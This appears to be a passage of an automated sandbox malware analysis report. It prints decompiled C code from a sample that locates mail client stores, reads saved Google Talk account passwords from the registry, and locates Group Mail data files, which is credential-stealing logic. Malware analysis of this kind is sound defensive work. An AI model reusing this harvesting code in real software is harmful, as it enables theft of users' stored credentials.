						_t55 =  *_t69;
					} while (_t55 != 0 && _t55 != 0x22);
					if( *_t69 == 0x22) {
						L16:
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
					}
				}
				L17:
				_t48 =  *_t69;
				if(_t48 != 0 && _t48 <= 0x20) {
					goto L16;
				}
				 *(_t71 - 0x4c) = 0;
				GetStartupInfoA(_t71 - 0x78);
				_t87 =  *(_t71 - 0x4c) & 0x00000001;
				if(( *(_t71 - 0x4c) & 0x00000001) == 0) {
					_t50 = 0xa;
				} else {
					_t50 =  *(_t71 - 0x48) & 0x0000ffff;
				}
				_t52 = E0040BB8D(_t63, _t87, GetModuleHandleA(0), 0, _t69, _t50); // executed
				_t70 = _t52;
				 *(_t71 - 0x7c) = _t70;
				if( *(_t71 - 0x1c) == 0) {
					exit(_t70); // executed
				}
				__imp___cexit();
				 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
				return E00412341(_t70);
			}





















                                                                                                                                                                        0x0041211a
                                                                                                                                                                        0x0041211c
                                                                                                                                                                        0x00412121
                                                                                                                                                                        0x0041212f
                                                                                                                                                                        0x00412136
                                                                                                                                                                        0x00412157
                                                                                                                                                                        0x00412157
                                                                                                                                                                        0x00412138
                                                                                                                                                                        0x0041213b
                                                                                                                                                                        0x00412143
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00412145
                                                                                                                                                                        0x00412145
                                                                                                                                                                        0x0041214e
                                                                                                                                                                        0x0041216f
                                                                                                                                                                        0x00412173
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00412175
                                                                                                                                                                        0x00412175
                                                                                                                                                                        0x00412177
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00412177
                                                                                                                                                                        0x00412150
                                                                                                                                                                        0x00412155
                                                                                                                                                                        0x0041215c
                                                                                                                                                                        0x00412163
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00412165
                                                                                                                                                                        0x00412165
                                                                                                                                                                        0x00412167
                                                                                                                                                                        0x0041217d
                                                                                                                                                                        0x0041217d
                                                                                                                                                                        0x0041217d
                                                                                                                                                                        0x00412180
                                                                                                                                                                        0x00412180
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00412155
                                                                                                                                                                        0x0041214e
                                                                                                                                                                        0x00412143
                                                                                                                                                                        0x00412183
                                                                                                                                                                        0x00412188
                                                                                                                                                                        0x0041218f
                                                                                                                                                                        0x00412196
                                                                                                                                                                        0x0041219d
                                                                                                                                                                        0x004121a3
                                                                                                                                                                        0x004121a9
                                                                                                                                                                        0x004121ab
                                                                                                                                                                        0x004121b1
                                                                                                                                                                        0x004121b7
                                                                                                                                                                        0x004121c0
                                                                                                                                                                        0x004121c5
                                                                                                                                                                        0x004121ca
                                                                                                                                                                        0x004121d0
                                                                                                                                                                        0x004121d7
                                                                                                                                                                        0x004121dd
                                                                                                                                                                        0x004121dd
                                                                                                                                                                        0x004121de
                                                                                                                                                                        0x004121e3
                                                                                                                                                                        0x004121e8
                                                                                                                                                                        0x004121ed
                                                                                                                                                                        0x004121f2
                                                                                                                                                                        0x004121f7
                                                                                                                                                                        0x00412216
                                                                                                                                                                        0x00412219
                                                                                                                                                                        0x0041221e
                                                                                                                                                                        0x00412223
                                                                                                                                                                        0x00412230
                                                                                                                                                                        0x00412232
                                                                                                                                                                        0x00412238
                                                                                                                                                                        0x00412274
                                                                                                                                                                        0x00412274
                                                                                                                                                                        0x00412277
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00412279
                                                                                                                                                                        0x0041227a
                                                                                                                                                                        0x0041227a
                                                                                                                                                                        0x0041223a
                                                                                                                                                                        0x0041223a
                                                                                                                                                                        0x0041223a
                                                                                                                                                                        0x0041223b
                                                                                                                                                                        0x0041223e
                                                                                                                                                                        0x00412240
                                                                                                                                                                        0x0041224b
                                                                                                                                                                        0x0041224d
                                                                                                                                                                        0x0041224d
                                                                                                                                                                        0x0041224e
                                                                                                                                                                        0x0041224e
                                                                                                                                                                        0x0041224b
                                                                                                                                                                        0x00412251
                                                                                                                                                                        0x00412251
                                                                                                                                                                        0x00412255
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0041225b
                                                                                                                                                                        0x00412262
                                                                                                                                                                        0x00412268
                                                                                                                                                                        0x0041226c
                                                                                                                                                                        0x00412281
                                                                                                                                                                        0x0041226e
                                                                                                                                                                        0x0041226e
                                                                                                                                                                        0x0041226e
                                                                                                                                                                        0x00412289
                                                                                                                                                                        0x0041228e
                                                                                                                                                                        0x00412290
                                                                                                                                                                        0x00412296
                                                                                                                                                                        0x00412299
                                                                                                                                                                        0x00412299
                                                                                                                                                                        0x0041229f
                                                                                                                                                                        0x004122d4
                                                                                                                                                                        0x004122df

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3662548030-0
                                                                                                                                                                        • Opcode ID: d9ca54d925000c8541e90f8f0bbdefa6f9bdc4c7a3278ea723e4384f5ba1aea6
                                                                                                                                                                        • Instruction ID: c2e845550ef1ad64eb6aea8f75856b2ed0c0391cefdfa0dcc66b3553e8bd0076
                                                                                                                                                                        • Opcode Fuzzy Hash: d9ca54d925000c8541e90f8f0bbdefa6f9bdc4c7a3278ea723e4384f5ba1aea6
                                                                                                                                                                        • Instruction Fuzzy Hash: 46419070D04249EFCB209FA4D9496ED7BB4EB09315F2081BBE861D7291D7B859D2CB1C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004113C4 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                        			E004113C4(void* __eflags, intOrPtr _a4) {
				void _v275;
				char _v276;
				char _v532;
				void _v539;
				char _v540;
				void _v795;
				char _v796;
				void* __edi;
				void* __esi;
				int _t44;
				char* _t46;
				char* _t48;
				void* _t64;
				intOrPtr _t65;
				void* _t66;
				signed int _t68;
				void* _t74;
				void* _t75;

				_t75 = __eflags;
				_v796 = 0;
				memset( &_v795, 0, 0x104);
				_t64 = 0x1c;
				_t61 =  &_v796;
				 *((intOrPtr*)(_a4 + 4)) = 1;
				E0040F4CA( &_v796, _t64); // executed
				E00406763( &_v796, "\\Microsoft\\Windows Mail");
				_t65 = _a4;
				E004112EC(_t65, _t75, _t61); // executed
				 *((intOrPtr*)(_t65 + 4)) = 2;
				_t66 = 0x1c;
				E0040F4CA(_t61, _t66);
				E00406763(_t61, "\\Microsoft\\Windows Live Mail");
				E004112EC(_a4, _t75, _t61); // executed
				_v276 = 0;
				memset( &_v275, 0, 0x104);
				_v540 = 0;
				memset( &_v539, 0, 0x104);
				E0040F232(_a4, 0x80000001, "Software\\Microsoft\\Windows Live Mail", "Store Root",  &_v276, 0x104); // executed
				_t74 = (_t68 & 0xfffffff8) - 0x31c + 0x38;
				ExpandEnvironmentStringsA( &_v276,  &_v540, 0x104);
				_t44 = strlen( &_v540);
				if(_t44 > 0) {
					_t48 = _t74 + _t44 + 0x117;
					if( *_t48 == 0x5c) {
						 *_t48 = 0;
					}
				}
				_push( &_v532);
				_t46 =  &_v796;
				_push(_t46);
				L00412072();
				_t78 = _t46;
				if(_t46 != 0) {
					_t46 = E004112EC(_a4, _t78,  &_v532); // executed
				}
				return _t46;
			}





















                                                                                                                                                                        0x004113c4
                                                                                                                                                                        0x004113e0
                                                                                                                                                                        0x004113e5
                                                                                                                                                                        0x004113f2
                                                                                                                                                                        0x004113f3
                                                                                                                                                                        0x004113f7
                                                                                                                                                                        0x004113fe
                                                                                                                                                                        0x00411408
                                                                                                                                                                        0x0041140d
                                                                                                                                                                        0x00411416
                                                                                                                                                                        0x0041141b
                                                                                                                                                                        0x00411424
                                                                                                                                                                        0x00411425
                                                                                                                                                                        0x0041142f
                                                                                                                                                                        0x0041143b
                                                                                                                                                                        0x0041144b
                                                                                                                                                                        0x00411453
                                                                                                                                                                        0x00411466
                                                                                                                                                                        0x0041146e
                                                                                                                                                                        0x0041148e
                                                                                                                                                                        0x00411493
                                                                                                                                                                        0x004114a7
                                                                                                                                                                        0x004114b5
                                                                                                                                                                        0x004114bd
                                                                                                                                                                        0x004114bf
                                                                                                                                                                        0x004114c9
                                                                                                                                                                        0x004114cb
                                                                                                                                                                        0x004114cb
                                                                                                                                                                        0x004114c9
                                                                                                                                                                        0x004114d5
                                                                                                                                                                        0x004114d6
                                                                                                                                                                        0x004114da
                                                                                                                                                                        0x004114db
                                                                                                                                                                        0x004114e0
                                                                                                                                                                        0x004114e4
                                                                                                                                                                        0x004114f1
                                                                                                                                                                        0x004114f1
                                                                                                                                                                        0x004114fc

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 004113E5
                                                                                                                                                                          • Part of subcall function 00406763: strlen.MSVCRT ref: 00406765
                                                                                                                                                                          • Part of subcall function 00406763: strlen.MSVCRT ref: 00406770
                                                                                                                                                                          • Part of subcall function 00406763: strcat.MSVCRT(00000000,0041140D,0000001C,0041140D,\Microsoft\Windows Mail,?,?,?), ref: 00406787
                                                                                                                                                                          • Part of subcall function 0040F4CA: memset.MSVCRT ref: 0040F51F
                                                                                                                                                                          • Part of subcall function 0040F4CA: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040F588
                                                                                                                                                                          • Part of subcall function 0040F4CA: strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040F596
                                                                                                                                                                        • memset.MSVCRT ref: 00411453
                                                                                                                                                                        • memset.MSVCRT ref: 0041146E
                                                                                                                                                                          • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
                                                                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004114A7
                                                                                                                                                                        • strlen.MSVCRT ref: 004114B5
                                                                                                                                                                        • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?,?), ref: 004114DB
                                                                                                                                                                        Strings
                                                                                                                                                                        • Software\Microsoft\Windows Live Mail, xrefs: 00411484
                                                                                                                                                                        • \Microsoft\Windows Mail, xrefs: 00411403
                                                                                                                                                                        • \Microsoft\Windows Live Mail, xrefs: 0041142A
                                                                                                                                                                        • Store Root, xrefs: 0041147F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$strlen$Close$EnvironmentExpandStrings_stricmpstrcatstrcpy
                                                                                                                                                                        • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                        • API String ID: 4071991895-2578778931
                                                                                                                                                                        • Opcode ID: b40a09ed6084c6be5fd3c209054c2b05923c65405b3fd14be26e8a18b8bd9bbc
                                                                                                                                                                        • Instruction ID: e9664ad0f3b84b924b74ee59ba002f7e9f43dcf230935329a4dad2143823624c
                                                                                                                                                                        • Opcode Fuzzy Hash: b40a09ed6084c6be5fd3c209054c2b05923c65405b3fd14be26e8a18b8bd9bbc
                                                                                                                                                                        • Instruction Fuzzy Hash: 45317772504348ABD320EBA9DD46FCB7BDC9B88714F00442FF649D7182EA78D55487AA
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040378B Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 308 40378b-4037dd memset * 2 call 411622 311 4038a3-4038a6 308->311 312 4037e3-403843 call 402197 call 4060da * 2 strchr 308->312 319 403845-403856 strcpy 312->319 320 403858-403863 strlen 312->320 321 403880-40389e strcpy call 4023c6 319->321 320->321 322 403865-40387d sprintf 320->322 321->311 322->321
                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                        			E0040378B(void* __ecx, void* __edi, void* __fp0, intOrPtr _a4) {
				char _v276;
				char _v404;
				intOrPtr _v408;
				char _v792;
				intOrPtr _v796;
				char _v924;
				char _v936;
				void _v1959;
				char _v1960;
				void _v2983;
				char _v2984;
				void* __ebx;
				void* __esi;
				void* _t28;
				void* _t50;
				void* _t51;
				char* _t59;
				char* _t63;
				void* _t70;

				_t70 = __fp0;
				_t51 = __ecx;
				_v1960 = 0;
				memset( &_v1959, 0, 0x3ff);
				_v2984 = 0;
				memset( &_v2983, 0, 0x3ff);
				_t28 = E00411622(_t51,  &_v2984,  &_v1960); // executed
				if(_t28 == 0) {
					return _t28;
				}
				E00402197( &_v936);
				_push( &_v1960);
				_t50 = 0x7f;
				E004060DA(_t50,  &_v276);
				_t59 =  &_v404;
				E004060DA(_t50, _t59,  &_v2984);
				_v796 = 9;
				_v408 = 3;
				_t63 = strchr(_t59, 0x40);
				_push( &_v404);
				if(_t63 == 0) {
					if(strlen() + 0xa < 0) {
						sprintf( &_v792, "%s@yahoo.com",  &_v404);
					}
				} else {
					strcpy( &_v792, ??);
					 *_t63 = 0;
				}
				strcpy( &_v924,  &_v404);
				return E004023C6( &_v936, _t70, _a4);
			}






















                                                                                                                                                                        0x0040378b
                                                                                                                                                                        0x0040378b
                                                                                                                                                                        0x004037a6
                                                                                                                                                                        0x004037ac
                                                                                                                                                                        0x004037ba
                                                                                                                                                                        0x004037c0
                                                                                                                                                                        0x004037d6
                                                                                                                                                                        0x004037dd
                                                                                                                                                                        0x004038a6
                                                                                                                                                                        0x004038a6
                                                                                                                                                                        0x004037ea
                                                                                                                                                                        0x004037f5
                                                                                                                                                                        0x004037f8
                                                                                                                                                                        0x004037ff
                                                                                                                                                                        0x0040380b
                                                                                                                                                                        0x00403811
                                                                                                                                                                        0x0040381b
                                                                                                                                                                        0x00403825
                                                                                                                                                                        0x00403837
                                                                                                                                                                        0x00403842
                                                                                                                                                                        0x00403843
                                                                                                                                                                        0x00403863
                                                                                                                                                                        0x00403878
                                                                                                                                                                        0x0040387d
                                                                                                                                                                        0x00403845
                                                                                                                                                                        0x0040384c
                                                                                                                                                                        0x00403853
                                                                                                                                                                        0x00403853
                                                                                                                                                                        0x0040388e
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 004037AC
                                                                                                                                                                        • memset.MSVCRT ref: 004037C0
                                                                                                                                                                          • Part of subcall function 00411622: memset.MSVCRT ref: 00411644
                                                                                                                                                                          • Part of subcall function 00411622: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004116B0
                                                                                                                                                                          • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
                                                                                                                                                                          • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
                                                                                                                                                                        • strchr.MSVCRT ref: 0040382F
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?), ref: 0040384C
                                                                                                                                                                        • strlen.MSVCRT ref: 00403858
                                                                                                                                                                        • sprintf.MSVCRT ref: 00403878
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?), ref: 0040388E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$strcpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                        • String ID: %s@yahoo.com
                                                                                                                                                                        • API String ID: 1649821605-3288273942
                                                                                                                                                                        • Opcode ID: 28c71e32e2af50959a8f735d191157fb7031000e76f71a7bd421d4c80fd3058b
                                                                                                                                                                        • Instruction ID: fac56a1422f5c84d721e9c9d17906f33e473bda0e694fa5a8ecc328811f6b8f6
                                                                                                                                                                        • Opcode Fuzzy Hash: 28c71e32e2af50959a8f735d191157fb7031000e76f71a7bd421d4c80fd3058b
                                                                                                                                                                        • Instruction Fuzzy Hash: 952186B3D0012C6EDB21EA54DD41BDA77AC9F45348F0401EBF649F6181E6B8AF848F69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004034A5 Relevance: 10.5, APIs: 4, Strings: 3, Instructions: 47stringCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 324 4034a5-403505 memset * 2 call 40f232 327 403541-403543 324->327 328 403507-403540 strcpy call 405f29 strcat call 4033b1 324->328 328->327
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E004034A5(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __edi;
				void* __esi;
				void* _t15;
				void* _t23;
				char* _t28;

				_t23 = __ecx;
				_v532 = 0;
				memset( &_v531, 0, 0x104);
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t15 = E0040F232(_t23, 0x80000002, "Software\\Group Mail", "InstallPath",  &_v532, 0xfa); // executed
				if(_t15 != 0) {
					strcpy( &_v268,  &_v532);
					_t28 =  &_v268;
					E00405F29(_t28);
					strcat(_t28, "fb.dat");
					return E004033B1(_t28, __fp0, _a4);
				}
				return _t15;
			}












                                                                                                                                                                        0x004034a5
                                                                                                                                                                        0x004034be
                                                                                                                                                                        0x004034c5
                                                                                                                                                                        0x004034d4
                                                                                                                                                                        0x004034db
                                                                                                                                                                        0x004034fb
                                                                                                                                                                        0x00403505
                                                                                                                                                                        0x00403516
                                                                                                                                                                        0x0040351b
                                                                                                                                                                        0x00403521
                                                                                                                                                                        0x0040352e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403540
                                                                                                                                                                        0x00403543

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 004034C5
                                                                                                                                                                        • memset.MSVCRT ref: 004034DB
                                                                                                                                                                          • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
                                                                                                                                                                        • strcpy.MSVCRT(00000000,00000000), ref: 00403516
                                                                                                                                                                          • Part of subcall function 00405F29: strlen.MSVCRT ref: 00405F2A
                                                                                                                                                                          • Part of subcall function 00405F29: strcat.MSVCRT(00000000,00414078,004062C9,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 00405F41
                                                                                                                                                                        • strcat.MSVCRT(00000000,fb.dat,00000000,00000000), ref: 0040352E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memsetstrcat$Closestrcpystrlen
                                                                                                                                                                        • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                        • API String ID: 1387626053-966475738
                                                                                                                                                                        • Opcode ID: 38ec8536de8e14aff3b9b3d106331788fa2226ffb78b3e274a34b9b5a513c2d5
                                                                                                                                                                        • Instruction ID: 36ed55b5d374e154850240320204e9d1b3c473ccad1168af83c786b56a3c059d
                                                                                                                                                                        • Opcode Fuzzy Hash: 38ec8536de8e14aff3b9b3d106331788fa2226ffb78b3e274a34b9b5a513c2d5
                                                                                                                                                                        • Instruction Fuzzy Hash: 8201D8B294012879D720E655DD46FCA7A6C5F34745F0000E6BA48F21C2DAFCABD58B69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040B91E Relevance: 9.1, APIs: 6, Instructions: 71stringwindowCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 333 40b91e-40b94d ??2@YAPAXI@Z 334 40b956 333->334 335 40b94f-40b954 333->335 336 40b958-40b96b ??2@YAPAXI@Z 334->336 335->336 337 40b976 336->337 338 40b96d-40b974 call 404026 336->338 340 40b978-40b99e 337->340 338->340 342 40b9a0-40b9a7 DeleteObject 340->342 343 40b9ad-40ba20 call 40625c call 4019da memset LoadIconA call 4019da strcpy 340->343 342->343
                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                        			E0040B91E(intOrPtr __eax, intOrPtr* __ebx) {
				struct HICON__* _v8;
				void _v263;
				char _v264;
				void* __edi;
				void* __esi;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				struct HICON__* _t28;
				intOrPtr* _t35;
				void* _t37;

				_t35 = __ebx;
				_t21 = __eax;
				 *((intOrPtr*)(__ebx + 0x124)) = 0;
				 *__ebx = 0x41457c;
				 *((intOrPtr*)(__ebx + 0x258)) = 0;
				_push(0x14);
				 *((intOrPtr*)(__ebx + 0x374)) = 0;
				L00412090();
				if(__eax == 0) {
					_t21 = 0;
					__eflags = 0;
				} else {
					 *0x418114 = __eax;
				}
				 *((intOrPtr*)(_t35 + 0x36c)) = _t21;
				L00412090(); // executed
				_t49 = _t21;
				_t37 = 0xf38;
				if(_t21 == 0) {
					_t22 = 0;
					__eflags = 0;
				} else {
					_t22 = E00404026(_t21, _t49);
				}
				 *((intOrPtr*)(_t35 + 0x370)) = _t22;
				 *((intOrPtr*)(_t35 + 0x378)) = 0;
				 *((intOrPtr*)(_t35 + 0x260)) = 0;
				 *((intOrPtr*)(_t35 + 0x25c)) = 0;
				 *((intOrPtr*)(_t35 + 0x154)) = 0;
				_t23 =  *(_t35 + 0x258);
				if(_t23 != 0) {
					DeleteObject(_t23);
					 *(_t35 + 0x258) = 0;
				}
				_t24 = E0040625C(); // executed
				 *(_t35 + 0x258) = _t24;
				E004019DA(_t37, _t35 + 0x158, 0x414490);
				_v264 = 0;
				memset( &_v263, 0, 0xff);
				_t28 = LoadIconA( *0x417b94, 0x65); // executed
				_v8 = _t28;
				strcpy(_t35 + 4, E004019DA(_t37,  &_v264, 0x414478));
				 *(_t35 + 0x104) = _v8;
				return _t35;
			}















                                                                                                                                                                        0x0040b91e
                                                                                                                                                                        0x0040b91e
                                                                                                                                                                        0x0040b92b
                                                                                                                                                                        0x0040b931
                                                                                                                                                                        0x0040b937
                                                                                                                                                                        0x0040b93d
                                                                                                                                                                        0x0040b93f
                                                                                                                                                                        0x0040b945
                                                                                                                                                                        0x0040b94d
                                                                                                                                                                        0x0040b956
                                                                                                                                                                        0x0040b956
                                                                                                                                                                        0x0040b94f
                                                                                                                                                                        0x0040b94f
                                                                                                                                                                        0x0040b94f
                                                                                                                                                                        0x0040b95d
                                                                                                                                                                        0x0040b963
                                                                                                                                                                        0x0040b968
                                                                                                                                                                        0x0040b96a
                                                                                                                                                                        0x0040b96b
                                                                                                                                                                        0x0040b976
                                                                                                                                                                        0x0040b976
                                                                                                                                                                        0x0040b96d
                                                                                                                                                                        0x0040b96f
                                                                                                                                                                        0x0040b96f
                                                                                                                                                                        0x0040b978
                                                                                                                                                                        0x0040b97e
                                                                                                                                                                        0x0040b984
                                                                                                                                                                        0x0040b98a
                                                                                                                                                                        0x0040b990
                                                                                                                                                                        0x0040b996
                                                                                                                                                                        0x0040b99e
                                                                                                                                                                        0x0040b9a1
                                                                                                                                                                        0x0040b9a7
                                                                                                                                                                        0x0040b9a7
                                                                                                                                                                        0x0040b9ad
                                                                                                                                                                        0x0040b9bd
                                                                                                                                                                        0x0040b9c3
                                                                                                                                                                        0x0040b9d6
                                                                                                                                                                        0x0040b9dd
                                                                                                                                                                        0x0040b9ed
                                                                                                                                                                        0x0040b9fe
                                                                                                                                                                        0x0040ba0b
                                                                                                                                                                        0x0040ba16
                                                                                                                                                                        0x0040ba20

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@$DeleteIconLoadObjectmemsetstrcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3205015851-0
                                                                                                                                                                        • Opcode ID: 2f8cdf16a645c1e46d6d809924f7a96c7986c5714da08ba0cbdd4ae4d3acf295
                                                                                                                                                                        • Instruction ID: 1611dc68708d9a603d76385fea93fddb5fcd3a07b13b65f331774950c43fbb3a
                                                                                                                                                                        • Opcode Fuzzy Hash: 2f8cdf16a645c1e46d6d809924f7a96c7986c5714da08ba0cbdd4ae4d3acf295
                                                                                                                                                                        • Instruction Fuzzy Hash: 9C2192F19002509BCB50EF758E897C97BA8AB44705F1444BBEE0CEF296D7B845818BAD
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004076B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                        			E004076B7(void* __ecx, void* __eflags, int _a4, char _a8, char _a12, void _a13, char _a268, void _a269) {
				void* _v0;
				char _v4;
				long _t29;
				void* _t33;
				void* _t36;
				signed int _t54;
				void* _t56;
				void* _t57;
				void* _t58;

				_t50 = __ecx;
				E00412360(0x1110, __ecx);
				E004073B6(_a4); // executed
				_t29 = E0040F1B0(0x80000001, "Software\\Google\\Google Talk\\Accounts",  &_v4);
				_t56 = (_t54 & 0xfffffff8) + 0xc;
				if(_t29 == 0) {
					_a4 = 0;
					_a12 = 0;
					memset( &_a13, 0, 0xff);
					_t57 = _t56 + 0xc;
					_t33 = E0040F276(_v0, 0,  &_a12);
					while(1) {
						_t58 = _t57 + 0xc;
						if(_t33 != 0) {
							break;
						}
						_t36 = E0040F1B0(_v0,  &_a12,  &_a8);
						_t57 = _t58 + 0xc;
						if(_t36 == 0) {
							_a268 = 0;
							memset( &_a269, 0, 0xfff);
							E0040F1F1(0xfff, _t50, _a8, "pw",  &_a268);
							_t57 = _t57 + 0x18;
							E00407570( &_a268, _a4,  &_a12);
							RegCloseKey(_v0);
						}
						_a4 = _a4 + 1;
						_t33 = E0040F276(_v0, _a4,  &_a12);
					}
					_t29 = RegCloseKey(_v0);
				}
				return _t29;
			}












                                                                                                                                                                        0x004076b7
                                                                                                                                                                        0x004076c2
                                                                                                                                                                        0x004076cc
                                                                                                                                                                        0x004076e0
                                                                                                                                                                        0x004076e5
                                                                                                                                                                        0x004076ea
                                                                                                                                                                        0x004076fd
                                                                                                                                                                        0x00407701
                                                                                                                                                                        0x00407705
                                                                                                                                                                        0x0040770a
                                                                                                                                                                        0x00407717
                                                                                                                                                                        0x004077ac
                                                                                                                                                                        0x004077ac
                                                                                                                                                                        0x004077b1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407735
                                                                                                                                                                        0x0040773a
                                                                                                                                                                        0x0040773f
                                                                                                                                                                        0x0040774f
                                                                                                                                                                        0x00407756
                                                                                                                                                                        0x00407774
                                                                                                                                                                        0x00407779
                                                                                                                                                                        0x0040778b
                                                                                                                                                                        0x00407794
                                                                                                                                                                        0x00407794
                                                                                                                                                                        0x00407796
                                                                                                                                                                        0x004077a7
                                                                                                                                                                        0x004077a7
                                                                                                                                                                        0x004077bb
                                                                                                                                                                        0x004077bb
                                                                                                                                                                        0x004077c2

                                                                                                                                                                        APIs
